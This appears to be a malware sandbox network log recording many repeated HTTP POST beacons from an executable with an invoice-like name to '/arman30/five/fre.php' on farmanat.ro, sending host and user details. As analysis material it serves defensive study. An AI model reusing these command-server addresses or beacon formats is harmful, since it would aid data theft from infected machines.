                                              Nov 25, 2021 10:50:33.031277895 CET6704OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:33.065408945 CET6704OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:33.117424011 CET6704INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              279192.168.11.2050121176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:33.541841030 CET6705OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:33.575417042 CET6705OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:33.626410961 CET6705INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              28192.168.11.2049863176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:19.719300985 CET6343OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:19.753021955 CET6344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:19.804265976 CET6344INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              280192.168.11.2050122176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:34.090399027 CET6706OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:34.123938084 CET6706OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:34.183954000 CET6707INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              281192.168.11.2050123176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:34.608633995 CET6707OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:34.642211914 CET6708OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:34.695179939 CET6708INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              282192.168.11.2050124176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:35.099443913 CET6709OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:35.132868052 CET6709OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:35.189446926 CET6709INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              283192.168.11.2050125176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:35.566498041 CET6710OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:35.600450039 CET6710OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:35.649811029 CET6711INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              284192.168.11.2050126176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:36.059382915 CET6711OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:36.093750000 CET6712OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:36.143910885 CET6712INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              285192.168.11.2050127176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:36.558923006 CET6713OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:36.592489958 CET6713OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:36.641537905 CET6713INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              286192.168.11.2050128176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:37.058804035 CET6714OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:37.092382908 CET6714OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:37.141966105 CET6715INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              287192.168.11.2050129176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:37.561801910 CET6715OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:37.595424891 CET6716OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:37.644316912 CET6716INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              288192.168.11.2050130176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:38.063390017 CET6717OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:38.096797943 CET6717OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:38.146338940 CET6717INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              289192.168.11.2050131176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:38.501799107 CET6718OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:38.536156893 CET6718OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:38.586780071 CET6719INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              29192.168.11.2049864176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:20.354984999 CET6345OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:20.388570070 CET6345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:20.438185930 CET6345INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              290192.168.11.2050132176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:38.984853029 CET6719OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:39.018599987 CET6720OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:39.068985939 CET6720INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              291192.168.11.2050133176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:39.497980118 CET6721OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:39.532198906 CET6721OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:39.594016075 CET6721INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              292192.168.11.2050134176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:40.012551069 CET6722OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:40.046864033 CET6722OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:40.099014997 CET6723INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              293192.168.11.2050135176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:40.520116091 CET6723OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:40.553749084 CET6724OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:40.605904102 CET6724INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              294192.168.11.2050136176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:41.030704975 CET6725OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:41.064265966 CET6725OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:41.114002943 CET6725INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
